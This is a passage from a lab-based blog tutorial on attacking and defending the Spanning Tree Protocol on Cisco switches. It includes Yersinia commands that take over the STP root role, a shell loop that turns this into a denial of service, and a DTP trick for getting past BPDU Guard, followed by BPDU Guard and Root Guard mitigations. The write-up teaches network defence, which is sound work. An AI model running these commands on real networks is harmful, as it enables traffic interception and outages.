between <span class="caps">ESW2</span> and <span class="caps">ESW3</span>) and the <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> lab won’t work with <abbr title="IOS On Unix"><span class="caps">IOU</span></abbr>.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="partial" title="Partial"><span class="sr-only">Partial</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The Spanning Tree Protocol first elects a root device, and once a root has been
elected all other devices calculate the shortest path to this root.</p>
<p>During the initial <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/#router-based-ethernet-switches" title="Introduction: router-based ethernet switches">configuration stage</a>, we explicitly set <span class="caps">SW1</span> to act
as the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root on all VLANs, building the following spanning tree:</p>
<p><span class="lb-small"><a href="#before.png" id="before.png-thumb" title="Click to enlarge"><img alt="Initial spanning tree" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/before.png"/></a></span></p>
<p>The direct link between <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> is not used, instead all data is
directly raised to the core switch <em><span class="caps">SW1</span></em>.
This is indeed the most efficient way for end-users to reach the inter-<span class="caps">VLAN</span>
router and from there the <em>Servers</em> <span class="caps">VLAN</span>.</p>
<p>We can check the initial situation through the command-line:</p>
<ul>
<li>
<p><em><span class="caps">ESW1</span></em> is indeed the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root for all VLANs and all its ports are in
forwarding state.
We can also note <em><span class="caps">ESW1</span></em> <span class="caps">MAC</span> address:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3e.0000</span>
<span class="hll"><span class="go"> This bridge is the root</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 0 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 0 8192 c202.0a3e.0000 128.43</span>
<span class="go">FastEthernet1/3 128.44 128 19 FWD 0 8192 c202.0a3e.0000 128.44</span>
<span class="go">FastEthernet1/4 128.45 128 19 FWD 0 8192 c202.0a3e.0000 128.45</span>
<span class="gp">ESW1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on the device, you may or may not need to use the <code>brief</code>
keyword.</p>
</div>
</li>
<li>
<p><em><span class="caps">ESW2</span></em> shows the correct root <span class="caps">MAC</span> address and uses the expected port to
reach it.
All its interfaces are in forwarding state:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Cost 19</span>
<span class="hll"><span class="go"> Port 41 (FastEthernet1/0)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c203.0a4d.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 19 32768 c203.0a4d.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c203.0a4d.0000 128.43</span>
<span class="gp">ESW2#</span>
</pre></div>
</li>
<li>
<p><em><span class="caps">ESW3</span></em> shows the correct root <span class="caps">MAC</span> address and uses the expected port to
reach it.
The redundant link to <em><span class="caps">ESW2</span></em> is blocked:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3e.0000</span>
</span><span class="go"> Cost 19</span>
<span class="hll"><span class="go"> Port 41 (FastEthernet1/0)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c204.0a5c.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 0 8192 c202.0a3e.0000 128.43</span>
<span class="hll"><span class="go">FastEthernet1/1 128.42 128 19 BLK 19 32768 c203.0a4d.0000 128.42</span>
</span><span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c204.0a5c.0000 128.43</span>
<span class="gp">ESW3#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on devices’ <span class="caps">MAC</span> address, the redundant link may be blocked
either on <em><span class="caps">ESW2</span></em> or <em><span class="caps">ESW3</span></em> side.</p>
</div>
</li>
</ul>
<h3 id="attacks"><a class="toclink" href="#attacks">Attacks</a></h3>
<h4 id="stp-topology-change"><a class="toclink" href="#stp-topology-change"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology change</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="partial" title="Partial"><span class="sr-only">Partial</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The attacker may find it convenient to raise himself to the position of
<abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root.
This can easily be done using a single command:</p>
<div class="codehilite"><pre><span class="gp">backbox@backbox:~$</span> sudo yersinia stp -attack 4
<span class="go">Warning: interface ens3 selected as the default one</span>
<span class="go"><*> Starting NONDOS attack Claiming Root Role...</span>
<span class="go"><*> Press any key to stop the attack <*></span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Keep the command running as long as you need to stay the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root.</p>
<p>Once you stop the command, the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> negotiation will automatically restore
the tree in its initial state.</p>
</div>
<p>Leave a few seconds for the topology change to become effective, then check
back the devices configuration:</p>
<ul>
<li>
<p><em><span class="caps">ESW1</span></em> is not the root node on <span class="caps">VLAN</span> 1 anymore:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3d.0000</span>
<span class="go"> Cost 57</span>
<span class="hll"><span class="go"> Port 43 (FastEthernet1/2)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 8192</span>
<span class="go"> Address c202.0a3e.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 57 8192 c202.0a3e.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 57 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 38 32768 c204.0a5c.0000 128.41</span>
<span class="go">FastEthernet1/3 128.44 128 19 FWD 57 8192 c202.0a3e.0000 128.44</span>
<span class="go">FastEthernet1/4 128.45 128 19 FWD 57 8192 c202.0a3e.0000 128.45</span>
<span class="gp">ESW1#</span>
</pre></div>
<p>Note that in the current case per-<span class="caps">VLAN</span> spanning tree (<abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr>) is used,
therefore only <span class="caps">VLAN</span> 1 is affected by this attack:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree root brief
<span class="go"> Root Hello Max Fwd</span>
<span class="go">Vlan Root ID Cost Time Age Delay Root Port</span>
<span class="go">---------------- -------------------- ----- ---- ---- ----- ----------------</span>
<span class="hll"><span class="go">VLAN1 8192 c202.0a3d.0000 57 2 20 15 FastEthernet1/2</span>
</span><span class="go">VLAN2 8192 c202.0a3e.0001 0 2 20 15 This bridge is root</span>
<span class="go">VLAN3 8192 c202.0a3e.0002 0 2 20 15 This bridge is root</span>
<span class="gp">ESW1#</span>
</pre></div>
<p>This may vary depending on the devices used and their configuration.</p>
</li>
<li>
<p><em><span class="caps">ESW2</span></em> flipped to the attacker’s fake root bridge, it now uses the
previously disabled link to contact it and blocks the link to the
legitimate root bridge:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3d.0000</span>
</span><span class="go"> Cost 57</span>
<span class="hll"><span class="go"> Port 42 (FastEthernet1/1)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c203.0a4d.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="hll"><span class="go">FastEthernet1/0 128.41 128 19 BLK 57 8192 c202.0a3e.0000 128.42</span>
</span><span class="go">FastEthernet1/1 128.42 128 19 FWD 38 32768 c204.0a5c.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 57 32768 c203.0a4d.0000 128.43</span>
<span class="gp">ESW2#</span>
</pre></div>
</li>
<li>
<p><em><span class="caps">ESW3</span></em> now considers that the root bridge is connected to the
attacker’s port:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3d.0000</span>
<span class="go"> Cost 38</span>
<span class="hll"><span class="go"> Port 43 (FastEthernet1/2)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c204.0a5c.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 38 32768 c204.0a5c.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 38 32768 c204.0a5c.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c204.0a5b.0000 128.43</span>
<span class="gp">ESW3#</span>
</pre></div>
</li>
</ul>
<p>Our little command turned the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology that way:</p>
<p><span class="lb-small"><a href="#after.png" id="after.png-thumb" title="Click to enlarge"><img alt="Altered spanning tree" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/after.png"/></a></span></p>
<p>Notice that the previously disabled redundant link between <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> is
now in use.
In fact, during this attack,
<em>
attacker’s nearest switches now take advantage of any redundant link to
optimize the connection to the attacker.
</em></p>
<ul>
<li>
<p>Previously, if the attacker wanted to intercept users communications,
the data would have had to go back and forth through <em><span class="caps">ESW1</span></em>.
Depending on <em><span class="caps">ESW1</span></em> location and load, this may cause speed and reliability
issues (both for the attacker and the users: users connectivity must be
maintained to have something to intercept).</p>
<p>Here is the initial route that users’ intercepted data should have taken:</p>
<div class="codehilite"><pre>User_1 > ESW2 > ESW1 > ESW3 > Attacker > ESW3 > ESW1 > R1 > ESW1 > ESW5 > Server_1
</pre></div>
<p>After the topology change, the attacker becomes closer to intercepted users
and the interception process doesn’t increase <em><span class="caps">SW1</span></em> load anymore:</p>
<div class="codehilite"><pre>User_1 > ESW3 > Attacker > ESW3 > ESW1 > R1 > ESW1 > ESW5 > Server_1
</pre></div>
</li>
<li>
<p>The same way, if the attacker wants to flood users devices, he can now do
it without involving <em><span class="caps">ESW1</span></em> at all making the flood more reliable,
effective and focused.</p>
</li>
</ul>
<h4 id="stp-based-denial-of-service"><a class="toclink" href="#stp-based-denial-of-service"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr>-based denial-of-service</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>A spanning tree takes time to converge, and during this phase phase no data is
forwarded by any switch from the tree.</p>
<p>A basic <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attack therefore consists in regularly sending topology
notification changes, resetting the convergence process before it has any
chance to finish.</p>
<p>Sadly, Yersinia’s <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attack goes a way too brutal route by sending tens of
thousands notifications per second (as fast as the link and local <span class="caps">CPU</span> can handle).
I think this is nonsense as this doesn’t even let enough the time for the
notification to propagate through the tree and doesn’t seem to achieve anything.</p>
<p>It is however possible to reuse the same command as above wrapped in a bit of
shell voodoo:</p>
<div class="codehilite"><pre><span class="nv">delay</span><span class="o">=</span>7<span class="p">;</span> <span class="k">while</span> sleep <span class="nv">$delay</span><span class="p">;</span> <span class="k">do</span> sleep <span class="nv">$delay</span> <span class="p">|</span> sudo yersinia stp -attack 4<span class="p">;</span> <span class="k">done</span>
</pre></div>
<p>This commands claims the root role, waits a little, gives the root role back to
the legitimate root bridge, waits a little, and loops by claiming the root role
again.
This lets enough time to allow the root election process to be initiated without
leaving enough time to let it terminate, thus resulting in an effective <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr>:</p>
<p><span class="lb-small"><a href="#dos.png" id="dos.png-thumb" title="Click to enlarge"><img alt="User_1 cannot contact Server_1 anymore" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/dos.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>As seen previously, <abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr> being used, each <span class="caps">VLAN</span> has its own spanning tree.
The effect of this <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr>-based <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attacks effect is therefore limited to
the current <span class="caps">VLAN</span> (but as we will see in later posts the attacker may
be able to change his current <span class="caps">VLAN</span>).</p>
<p>While members of the <em>Users</em> <span class="caps">VLAN</span> have lost connectivity with <em>Server_1</em>,
members of the <em>Admins</em> <span class="caps">VLAN</span> can still access it without any issue.</p>
</div>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<p>There are two measures you can take to mitigate this attack.
They are not exclusive, in fact it is recommended to apply both as they
complement themselves well.</p>
<h4 id="bpdu-guard-access-layer"><a class="toclink" href="#bpdu-guard-access-layer"><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard (access layer)</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The <a href="https://www.cisco.com/c/en/us/support/docs/lan-switching/spanning-tree-protocol/10586-65.html" rel="external" title="Spanning Tree PortFast BPDU Guard Enhancement (Cisco)"><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard</a> feature comes with PortFast:</p>
<ul>
<li>
<p>PortFast allows to bypass some steps in the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> convergence process to
start to forward frames sooner and reduce unavailability.
In particular, PortFast bypasses topology loop checks and must therefore be
enabled only on ports where no switch will ever be connected: access ports.</p>
</li>
<li>
<p><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard accompanies PortFast by actively checking that no <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>
(the packets carrying <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages) are received on such ports.
Would a <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> be received on a protected port, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard will
shut it down, either temporarily or definitively depending on the configuration.</p>
</li>
</ul>
<p>The most convenient way is to first enable PortFast’s BPDUGuard feature,
and then enable PortFast on the desired ports:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">spanning-tree</span> portfast bpduguard
</span><span class="gp">ESW3(config)#</span><span class="k">interface</span><span class="s"> fastEthernet 1/2</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="k">spanning-tree</span> portfast
</span><span class="go">%Warning: portfast should only be enabled on ports connected to a single host.</span>
<span class="go">Connecting hubs, concentrators, switches, bridges, etc.to this interface</span>
<span class="go">when portfast is enabled, can cause temporary spanning tree loops.</span>
<span class="go">Use with CAUTION</span>
<span class="go">%Portfast has been configured on FastEthernet1/2 but will only</span>
<span class="go">have effect when the interface is in a non-trunking mode.</span>
<span class="gp">ESW3(config-if)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:20:45.131: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">ESW3#</span>
</pre></div>
<p>Attempting to reproduce the attack now shuts the attacker’s port down:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:36.279: %SPANTREE-2-RX_PORTFAST: Received BPDU on PortFast enabled port. Disabling FastEthernet1/2.</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:36.279: %PM-4-ERR_DISABLE: bpduguard error detected on Fa1/2, putting Fa1/2 in err-disable state</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:37.283: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/2, changed state to down</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:38.315: %LINK-3-UPDOWN: Interface FastEthernet1/2, changed state to down</span>
<span class="gp">ESW3#</span>
<span class="gp">ESW3#</span><span class="k">show</span> interfaces status err-disabled
<span class="go">Port Name Status Reason</span>
<span class="hll"><span class="go">Fa1/2 err-disabled bpduguard</span>
</span><span class="gp">ESW3#</span>
</pre></div>
<p>By default, ports disabled this way must be manually reinitialized using the
<code>shut</code> and <code>no shut</code> commands:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">ESW3(config)#</span><span class="k">interface</span><span class="s"> fastEthernet 1/2</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="k">shutdown</span>
</span><span class="gp">ESW3(config-if)#</span>
<span class="gt">*Mar 1 00:12:59.087: %LINK-5-CHANGED: Interface FastEthernet1/2, changed state to administratively down</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="ow">no </span><span class="k">shutdown</span>
</span><span class="gp">ESW3(config-if)#</span>
<span class="gt">*Mar 1 00:13:09.343: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/2, changed state to up</span>
<span class="gp">ESW3(config-if)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:13:13.707: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span>
</pre></div>
<p>It is however possible to set a timeout after which the port will be
automatically restored:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">errdisable</span> recovery cause bpduguard
</span><span class="gp">ESW3(config)#</span><span class="c1">! By default the timeout is set to 300 seconds (= 5 minutes), to change it:</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">errdisable</span> recovery interval <span class="s">30</span>
</span><span class="gp">ESW3(config)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:32:08.995: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span><span class="k">show</span> errdisable recovery
<span class="go">ErrDisable Reason Timer Status</span>
<span class="go">----------------- --------------</span>
<span class="go">udld Disabled</span>
<span class="go">bpduguard Enabled</span>
<span class="go">rootguard Disabled</span>
<span class="go">pagp-flap Disabled</span>
<span class="go">dtp-flap Disabled</span>
<span class="go">link-flap Disabled</span>
<span class="go">Timer interval: 30 seconds</span>
<span class="go">Interfaces that will be enabled at the next timeout:</span>
<span class="gp">ESW3#</span>
</pre></div>
<h5 id="circumventing-bpdu-guard"><a class="toclink" href="#circumventing-bpdu-guard">Circumventing <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Depending on the devices used and their configuration, it may be possible for
an attacker to bypass <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard protection.</p>
<p>As previously stated, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard relies on PortFast, and when enabling PortFast
on a port <span class="caps">IOS</span> produces a warning stating that:</p>
<blockquote>
<p>Portfast […] will only have effect when the interface is in a
non-trunking mode.</p>
</blockquote>
<p>The consequence of this is that an attacker who has the ability to enable
trunk mode on the port has the ability to disable Portfast, and therefore
to disable <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard altogether.</p>
<p>We will cover <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-based exploits in a later post, but here just notice that
simply letting <code>yersinia dtp -attack 1</code> running in one terminal should
effectively disable <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard and make all the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> attacks described in this
post working again as-is.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>This affects only <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-aware devices, so <strong><em>not</em></strong> router-based switches.</p>
</div>
<h4 id="root-guard-distribution-layer"><a class="toclink" href="#root-guard-distribution-layer">Root Guard (distribution layer)</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The <a href="https://www.cisco.com/c/en/us/support/docs/lan-switching/spanning-tree-protocol/10588-74.html" rel="external" title="Spanning Tree Protocol Root Guard Enhancement (Cisco)">Root Guard</a> feature prevents the ports where it is enabled to ever
become root ports, ie. ports used to reach the root bridge.</p>
<p>Root Guard has two main differences compared to <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard:</p>
<ul>
<li>
<p>Root Guard does not prevent <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> communication on the ports where it is
enabled: it only reacts <abbr title="Bridge Protocol Data Units">BPDUs</abbr> which would lead to the election of a root
behind protected ports.</p>
</li>
<li>
<p>The port connectivity (forwarding state) is automatically re-enabled as
soon as no more illegal <abbr title="Bridge Protocol Data Units">BPDUs</abbr> are received on the port.</p>
</li>
</ul>
<p>Root Guard can be enabled in various positions in the topology:</p>
<ul>
<li>
<p>It can be enabled on the access layer switches to ensure that access ports
are not used to maliciously trigger a topology change.
However, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard might be more appropriate here.</p>
</li>
<li>
<p>It can be enabled on intermediary bridges, this may be useful in case of
shared administrative control.</p>
</li>
<li>
<p>If you have a fixed root bridge you can apply Root Guard directly to it.
This is what we will do in our lab topology.</p>
</li>
</ul>
<p>Root Guard can be applied on distribution layer switches while applying <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>
guard on access layer switches.
This provides a layered security approach both against malicious and
inadvertent actions which would result in a <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology change.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>A violation of the RootGuard policy results in the port being temporarily
set to “root-inconsistent” state and not forwarding any frame.
Measure any impact this may have in terms of potential networking outages.
In particular, don’t enable it on your infrastructure switches without
properly enabling <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> guard at the access layer.
Otherwise in attacker’s hands Root Guard will become a perfect <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> tool.</p>
</div>
<p>Here we enable Root Guard on all ports of the legitimate <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root:</p>
<div class="codehilite"><pre><span class="gp">IOU1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">IOU1(config)#</span><span class="k">interface</span> range<span class="s"> ethernet 0/0 - 3, ethernet 1/0 - 3</span>
<span class="hll"><span class="gp">IOU1(config-if-range)#</span><span class="k">spanning-tree</span> guard root
</span><span class="gp">IOU1(config-if-range)#</span>
<span class="gt">*Oct 16 11:26:22.214: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/0.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/1.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/2.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet0/3.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/0.</span>
<span class="gt">*Oct 16 11:26:22.215: %SPANTREE-2-ROOTGUARD_CONFIG_CHANGE: Root guard enabled on port Ethernet1/1.</span>
<span class="gp">IOU1(config-if-range)#</span>
